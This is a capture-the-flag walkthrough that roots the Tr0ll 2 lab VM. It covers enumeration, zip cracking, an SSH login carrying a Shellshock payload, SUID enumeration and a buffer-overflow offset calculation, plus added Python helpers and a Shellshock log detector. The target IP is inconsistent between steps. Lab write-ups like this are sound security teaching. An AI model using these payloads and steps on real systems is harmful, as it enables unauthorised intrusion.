Introduction
In this post you will learn how to get root on Tr0ll 2 and how to capture the flag. Let’s begin.
To download Tr0ll 2, [Click here]
Tr0ll2 Hacking phases
- Finding target IP
- Nmap scan
- Viewing target site
- Curl Home page
- Dirb
- Download robots.txt
- Enumerating cat_the_troll
- Decoding base 64
- FTP login for Zip file
- Cracking zip file (Fcrackzip)
- Elevating access
- Buffer overflow
- Debug using GDB
Hack Tr0ll 2
Finding target IP
To find the target IP, just run arp-scan -l or the netdiscover command.
sudo arp-scan -l
![](http://techyrick.com/wp-content/uploads/2022/03/arp-scan-tr-1024x342.webp)
Nmap scan
I am doing the -A scan; -A enables aggressive scanning, which includes OS and service detection.
nmap -A 192.168.1.2
![](http://techyrick.com/wp-content/uploads/2022/03/nmap-tr-1024x459.webp)
From the nmap scan we can see that ports 21 (FTP), 22 (TCP) and 80 (TCP) are open.
Viewing target site
I wanted to take a look at the site, so I just pasted the target IP into the browser. The page looked the same as in Tr0ll 1, but this time the phrases had changed.
http://192.168.1.2
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-22_54_53-192.168.1.2-Opera.webp)
I felt something was off about the site, so I fetched it with curl.
Curl Home page
curl 192.168.1.2
![](http://techyrick.com/wp-content/uploads/2022/03/curl-tr.webp)
Trolled again.
Dirb
dirb http://192.168.1.2 rockyou.txt
![](http://techyrick.com/wp-content/uploads/2022/03/dirb-tr.webp)
Found robots.txt
View robots.txt
Found a bunch of usernames
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-23_03_45-Hack-the-Tr0ll-2-Boot2Root-Challenge-Hacking-Articles-Opera.png)
Download robots.txt
wget http://192.168.1.2/robots.txt
nano robots.txt
![](http://techyrick.com/wp-content/uploads/2022/03/wget-tr-1024x197.webp)
Doing dirb scan using the robots.txt file
dirb http://192.168.1.2/ robots.txt
![](http://techyrick.com/wp-content/uploads/2022/03/2nd-dirb.webp)
Found 4 URLs, and I am moving to the 4th one, /ok_this_is_it
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-23_17_49-192.168.1.2_ok_this_is_it_-Opera.webp)
I wanted to view the page source
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-23_19_13-view-source_192.168.1.2_ok_this_is_it_-Opera.webp)
Enumerating cat_the_troll
Downloading the image we saw
wget http://192.168.1.131/dont_bother/cat_the_troll.jpg
![](http://techyrick.com/wp-content/uploads/2022/03/wget2-tr-1024x183.webp)
tail -n 3 cat_the_troll.jpg
Viewing the last three lines
![](http://techyrick.com/wp-content/uploads/2022/03/tail-1024x158.webp)
It says to look deep in y0ur_self.
So, I wanted to go to that link too…
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-23_27_07-Index-of-_y0ur_self-Opera.webp)
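The tail command above works because the hint was simply appended after the end of the JPEG data. A more reliable way to check any image for appended content is to walk the JPEG segment structure to the EOI marker and report whatever follows it, since a naive search for the last FF D9 can be fooled by bytes in the trailer itself. The following is an added example, not code from the original post; the SAMPLE bytes are a constructed minimal JPEG with a constructed trailer in the spirit of the page's hint.

```python
import struct

# JPEG marker codes used by the walker.
SOI, EOI, SOS, TEM = 0xD8, 0xD9, 0xDA, 0x01


def find_jpeg_end(data: bytes) -> int:
    """Walk the JPEG segment structure and return the offset just past EOI.

    Follows segment lengths and the byte-stuffing rules of entropy-coded data,
    so bytes appended after the image cannot confuse it.
    Raises ValueError if the stream is not a well-formed JPEG.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker")
    n = len(data)
    pos = 2
    while pos < n:
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        while pos < n and data[pos] == 0xFF:          # skip fill bytes
            pos += 1
        if pos >= n:
            raise ValueError("truncated marker")
        marker = data[pos]
        pos += 1
        if marker == EOI:
            return pos
        if marker == TEM or 0xD0 <= marker <= 0xD7:   # standalone markers carry no length
            continue
        if pos + 2 > n:
            raise ValueError("truncated segment header")
        (seglen,) = struct.unpack(">H", data[pos:pos + 2])
        if seglen < 2:
            raise ValueError("bad segment length")
        pos += seglen
        if marker == SOS:
            # Entropy-coded data follows: FF 00 is a stuffed data byte and
            # FF D0..D7 are restart markers; any other marker ends the scan.
            while True:
                idx = data.find(b"\xff", pos)
                if idx < 0 or idx + 1 >= n:
                    raise ValueError("truncated scan data")
                nxt = data[idx + 1]
                if nxt == 0x00 or 0xD0 <= nxt <= 0xD7:
                    pos = idx + 2
                elif nxt == 0xFF:
                    pos = idx + 1
                else:
                    pos = idx
                    break
    raise ValueError("no EOI marker found")


def trailing_data(data: bytes) -> bytes:
    """Return whatever follows the image proper (empty bytes for a clean file)."""
    return data[find_jpeg_end(data):]


# Constructed sample (not a real file): a minimal, structurally valid JPEG plus a text trailer.
SAMPLE = (
    b"\xff\xd8"                              # SOI
    b"\xff\xe0\x00\x04JF"                    # APP0 segment, length 4 (2 length bytes + 2 payload bytes)
    b"\xff\xda\x00\x03\x01"                  # SOS header, length 3
    b"\x12\x34\xff\x00\x56\xff\xd0\x78"      # scan data with a stuffed FF 00 and an RST0 marker
    b"\xff\xd9"                              # EOI
    b"Look Deep within y0ur_self for the answer\n"   # constructed trailer
)

if __name__ == "__main__":
    print(trailing_data(SAMPLE).decode(errors="replace"))
```

Run it against a real file with `trailing_data(open("cat_the_troll.jpg", "rb").read())`; a clean image returns empty bytes, and anything else is data that the image viewer silently ignores.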
Doing wget again to get the answer.txt file
wget http://192.168.1.2/y0ur_self/answer.txt
![](http://techyrick.com/wp-content/uploads/2022/03/answer-1024x183.webp)
The content of answer.txt looks like base64, so let’s decode it.
Decoding base 64
To decode the file, just enter the below command
base64 -d answer.txt > decoded.txt
After decoding, I found a bunch of usernames in decoded.txt.
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-21_52_35-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl.webp)
FTP login for Zip file
ftp 192.168.1.131
ls
get lmao.zip
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-21_56_31-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl-1024x388.webp)
Username: Tr0ll
Password: Tr0ll
When connecting to FTP we can see Tr0ll in the first line as the username, and I guessed that it would also be the password. If you have played Tr0ll: 1, you know why I am saying this.
We found lmao.zip, so we just downloaded it.
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-21_57_01-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl-1024x689.webp)
Cracking zip file (Fcrackzip)
fcrackzip -u -D -p decoded.txt lmao.zip
unzip lmao.zip
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-21_58_26-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl.webp)
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-21_59_25-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl.webp)
Doing cat noob to view the file
cat noob
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-22_00_04-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl.webp)
Restrict the key file's permissions and log in with it. The quoted argument is a Shellshock-style function definition passed as the SSH command, which gives us /bin/bash; id confirms which user we are.
chmod 600 noob
ssh -i noob noob@192.168.1.131 '() { :;}; /bin/bash'
id
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-22_16_26-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl-1.webp)
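From the defender's side, the trick used in the ssh step above leaves a recognisable fingerprint: a value that begins with a bash function definition `() { ... }` followed by a trailing command. The check below scans log lines for that shape and reports the hits; it is an added example, not code from the original post. It assumes a ForceCommand wrapper that logs SSH_ORIGINAL_COMMAND, and the log lines are constructed for the example rather than taken from a real system.

```python
import re
from typing import Iterable, List, Tuple

# Bash treats an imported environment value that starts with "() {" as a function
# definition; vulnerable versions kept executing whatever followed the closing brace.
# Matching requires both the definition and a trailing ";" so ordinary function text
# in a log line is not flagged.
SHELLSHOCK_PREFIX = re.compile(r"\(\)\s*\{[^}]*\}\s*;")


def is_shellshock_probe(value: str) -> bool:
    """True if the string carries a function-definition prefix with a trailing command."""
    return SHELLSHOCK_PREFIX.search(value) is not None


def flag_lines(lines: Iterable[str]) -> List[Tuple[int, str]]:
    """Return (line number, matched fragment) for every line carrying the pattern."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = SHELLSHOCK_PREFIX.search(line)
        if match:
            hits.append((number, match.group(0)))
    return hits


# Constructed sample log lines (hypothetical wrapper output, not real logs).
SAMPLE_LOG = [
    "sshd[4021]: Accepted publickey for noob from 192.0.2.10 port 51234 ssh2",
    'wrapper[4022]: SSH_ORIGINAL_COMMAND="() { :;}; /bin/bash" for user noob',
    "wrapper[4023]: SSH_ORIGINAL_COMMAND=\"unlock() { echo ok; }\" for user noob",
    "sshd[4030]: Received disconnect from 192.0.2.10 port 51234:11: disconnected by user",
]

if __name__ == "__main__":
    for number, fragment in flag_lines(SAMPLE_LOG):
        print(f"line {number}: {fragment}")
```

Only the second line is reported: the third line contains a function definition but no command after the closing brace, which is the part that made the original bug dangerous. Treat a hit as a strong signal and tune the pattern if your own logs legitimately contain shell function text.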
Elevating access
Upgrade to an interactive TTY, then search for SUID binaries:
python -c "import pty;pty.spawn('/bin/bash');"
find / -perm -4000 2>/dev/null
Move to nothing_to_see_here/choose_wisely
And then execute ./r00t
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-22_31_04-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl.webp)
Buffer overflow
Generate a 500-byte cyclic pattern with pattern_create.rb:
./pattern_create.rb -l 500
![](http://techyrick.com/wp-content/uploads/2022/03/082018_2009_VulnhubMach27-1.jpg)
Debug using GDB
![](http://techyrick.com/wp-content/uploads/2022/03/082018_2009_VulnhubMach28.webp)
Looking up the value found in the debugger with pattern_offset shows that the offset is 268.
![](http://techyrick.com/wp-content/uploads/2022/03/082018_2009_VulnhubMach29.webp)
![](http://techyrick.com/wp-content/uploads/2022/03/082018_2009_VulnhubMach32.jpg)
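The measurement in the two steps above relies on one property of the pattern: every 4-byte window of the Metasploit cyclic pattern is unique, so the bytes that end up in the saved return address identify exactly how far the input travelled. The following added example (not the page's or Metasploit's own code) reimplements both pattern_create and pattern_offset in Python so the 268 figure can be reproduced. The value i9Aj is the text the pattern places at offset 268, and 0x6a413969 is simply its little-endian register form; both are derived here, not taken from the page.

```python
import string
from typing import Optional, Union

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
MAX_UNIQUE = len(UPPER) * len(LOWER) * len(DIGITS) * 3   # 20280 bytes


def pattern_create(length: int) -> bytes:
    """Build the cyclic pattern Aa0Aa1...Aa9Ab0... truncated to `length` bytes."""
    if length > MAX_UNIQUE:
        raise ValueError(f"pattern longer than {MAX_UNIQUE} bytes is no longer unique")
    out = bytearray()
    for a in UPPER:
        for b in LOWER:
            for c in DIGITS:
                out += (a + b + c).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(value: Union[str, bytes, int], length: int = MAX_UNIQUE) -> Optional[int]:
    """Return the offset of a 4-byte value inside the pattern, or None if absent.

    Accepts the raw text seen in the crash (b"i9Aj") or the 32-bit register
    value as an int (0x6a413969), which is converted from little-endian byte
    order first, mirroring how the Metasploit script treats a 0x... argument.
    """
    if isinstance(value, int):
        needle = value.to_bytes(4, "little")
    elif isinstance(value, str):
        needle = value.encode()
    else:
        needle = value
    idx = pattern_create(length).find(needle)
    return None if idx < 0 else idx


if __name__ == "__main__":
    print(pattern_create(500).decode())
    print(pattern_offset("i9Aj"))        # text form
    print(pattern_offset(0x6a413969))   # register form
```

Because the 3-character triplets cycle through the digit fastest, the characters at positions 267..272 are `Ai9Aj0`, so the window starting at 268 is `i9Aj`; reading the same four bytes as a little-endian 32-bit integer gives 0x6a413969, and both lookups return 268.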